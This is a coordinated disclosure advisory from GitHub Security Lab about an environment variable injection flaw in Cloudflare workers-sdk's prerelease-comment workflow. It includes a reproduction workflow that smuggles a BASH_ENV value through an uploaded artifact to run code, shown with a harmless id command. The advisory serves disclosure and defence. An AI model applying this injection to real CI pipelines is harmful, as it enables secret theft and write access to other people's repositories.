Coordinated Disclosure Timeline

Summary

Cloudflare workers-sdk write-prerelease-comment.yml workflow is vulnerable to environment variable injection which may allow an attacker to leak secrets and gain write access to the repository.

Project

Cloudflare workers-sdk

Tested Version

Latest commit at the time of reporting.

Details

Environment Variable Injection in write-prerelease-comment.yml (GHSL-2024-252)

The write-prerelease-comment.yml workflow is triggered when a workflow called “Create Pull Request Prerelease” finishes.

on:
  workflow_run:
    workflows: ["Create Pull Request Prerelease"]
    types:
      - completed

An attacker may create a pull request that modifies the triggering “Create Pull Request Prerelease” workflow and uploads arbitrary artifacts before triggering the Vulnerable workflow.

The job comment gets executed if github.repository_owner == 'cloudflare' but this condition is always true in the context of a workflow_run triggered workflow since it runs in the context of the default branch so it offers no protection.

jobs:
  comment:
    if: ${{ github.repository_owner == 'cloudflare' }}

The workflow then runs “Put PR and workflow ID on the environment” and then downloads the artifacts from the triggering workflow:

      - name: "Download runtime versions"
        # Regular `actions/download-artifact` doesn't support downloading
        # artifacts from another workflow
        uses: dawidd6/action-download-artifact@v2
        with:
          run_id: ${{ github.event.workflow_run.id }}
          name: runtime-versions.md

      - name: "Put runtime versions on the environment"
        id: runtime_versions
        run: |
          {
            echo 'RUNTIME_VERSIONS<<EOF'
            cat runtime-versions.md
            echo EOF
          } >> "$GITHUB_ENV"

Since the contents of the artifact are not validated, an attacker may craft a malicious runtime-versions.md file with multiple lines on it which will be used to set up new environment variables. By injecting a new environment variable called BASH_ENV, an attacker will be able to run arbitrary code when the next run: step triggers.

Steps to reproduce

name: Create Pull Request Prerelease

on:
  pull_request:

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - run: |
          cat << 'EOF2' > runtime-versions.md
          FOO
          EOF
          BASH_ENV<<EOF3
          $(id 1>&2)
          EOF3
          DUMMY<<EOF
          DUMMY
          EOF2
      - run: |
          cat runtime-versions.md
      - name: Upload runtime versions
        uses: actions/upload-artifact@v3
        with:
          name: runtime-versions.md
          path: runtime-versions.md
      - run: |
          cat << 'EOF2' > prerelease-report.md
          FOO
          EOF
          BASH_ENV<<EOF3
          $(id 1>&2)
          EOF3
          DUMMY<<EOF
          DUMMY
          EOF2
      - run: |
          cat prerelease-report.md
      - name: Upload runtime versions
        uses: actions/upload-artifact@v3
        with:
          name: prerelease-report.md
          path: prerelease-report.md

uid=1001(runner) gid=127(docker) groups=127(docker),4(adm),101(systemd-journal)

Impact

The workflow runs in the context of a full-write GITHUB_TOKEN token:

https://github.com/cloudflare/workers-sdk/actions/runs/11106549077/job/30855119163

GITHUB_TOKEN Permissions
  Actions: write
  Attestations: write
  Checks: write
  Contents: write
  Deployments: write
  Discussions: write
  Issues: write
  Metadata: read
  Packages: write
  Pages: write
  PullRequests: write
  RepositoryProjects: write
  SecurityEvents: write
  Statuses: write

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-252 in any communication regarding this issue.